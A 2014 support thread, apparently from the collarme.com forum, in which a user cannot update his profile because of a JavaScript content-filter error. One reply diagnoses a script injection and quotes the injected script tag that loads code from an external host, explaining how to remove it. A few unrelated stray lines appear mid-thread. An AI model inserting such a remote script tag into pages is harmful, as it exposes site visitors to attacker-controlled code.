Macharius -> Hi (javascript error message) (1/13/2014 11:55:08 AM)

Not sure where else to post this.. But I'm trying to edit my profile, and every time I click submit, it brings up a window that says 'Javascript' rejected by content filter. How do I fix this?

I edited your Subject line to be a little more descriptive.

You did post in the right place. You should probably add what browser and OS you are using.

If no one here is able to help you, contact Support: http://www.collarme.com/personals/support.htm

I used Firefox and Chrome

without knowing what you are actually trying to edit/type into your profile, I am going to guess its a formatting conflict. If you are copy and pasting from another program or off a website directly into the window, that is a good clue, unless you are actually typing in java code

I'm trying to update my age with my birthday.. From 25 to 26.. And I click it and it says javascript blocked by CM's content filter.

It's $175.00.

I'm here for you.

Did you use the captcha at the bottom?

Macharius -> RE: Hi (javascript error message) (1/13/2014 4:33:32 PM)

Yes. When I click it it gives that message.

Darkfeather -> RE: Hi (javascript error message) (1/13/2014 4:33:51 PM)

unless you have gone into your browser setting and messed around with them, just using the drop-down menu should not give you any problems. If, of course, you also entered the captcha. If you have altered your default browser settings, that would be a whole nother conversation

Fast Reply

Content filter refers to the text. Please copy the text of the profile to NotePad. Wipe the profile text. Click on the New Document icon (looks like a sheet of paper in the edit text section), enter the verification string, then click Update.

That should fix the problem. If not, contact Support.

In this case, that won’t help. Like numerous profiles on CM, Macharius’ was hit with a JavaScript injection. The profile currently contains a link to an externally hosted script. This isn’t visible or editable from within the site’s rich text editor, because it’s part of a non-visible HTML script tag. To remove it, he’ll need to temporarily disable JavaScript to prevent TinyMCE from loading, then delete the following line from the profile:

<script src=“http://hogr.eu5.org/g”></script>

Support has used the method I gave on numerous profiles.

It works without fail for the javascript error.

Sorry, I missed the step where you mentioned clicking on New Document. That will indeed work. Simply wiping the profile text won’t, and is a superfluous step; but, for some reason, it’s all I saw on the first read. Apologies for the confusion.
